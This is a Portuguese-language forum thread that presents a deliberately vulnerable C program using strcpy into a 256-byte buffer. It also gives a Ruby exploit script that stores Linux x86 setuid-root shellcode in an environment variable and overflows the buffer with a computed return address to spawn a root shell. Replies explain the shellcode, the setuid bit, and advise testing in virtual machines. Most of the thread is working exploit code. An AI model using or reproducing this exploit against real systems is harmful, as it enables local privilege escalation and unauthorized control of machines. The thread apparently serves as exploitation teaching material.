falha de Buffer Overflow (escrito em C):
int main(int argv,char **argc) {
char buf[256];
strcpy(buf,argc[1]);
}
Ruby exploit:
#!/usr/local/bin/ruby
shellcode =
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"+
"\x31\xdb\x89\xd8\xb0\x2e\xcd\x80"+
"\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69"+
"\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"
path = "./falha"
buffer = ("A" * 268)
ret = (0xbffffffa - shellcode.length - path.length)
print "Shellcode : " , shellcode.length , "\n"
print "Path : ", path.length, "\n"
print "New ret : " , ret , "\n"
new_ret = [ret].pack('L')
buffer += new_ret
ENV['BadShell'] = "#{ENV['BadShell']}#{shellcode}"
system(path,buffer)
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"+
"\x31\xdb\x89\xd8\xb0\x2e\xcd\x80"+
"\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69"+
"\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"
Faz o que essa shellcode?
Quote from: Wuefez on 03 de June , 2009, 03:36:12 AM
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"+
"\x31\xdb\x89\xd8\xb0\x2e\xcd\x80"+
"\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69"+
"\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"
Faz o que essa shellcode?
bina uma shell root!
EDIT: de permissões
chmod u+s exploit
u = Da as permissões que o usuário proprietário do arquivo têm....
s = seleciona o usuário ou identificação do grupo durante a execução ...
obs: Todo e qualquer exploit (mesmo os seus) devem ser testados em maquinas virtuais...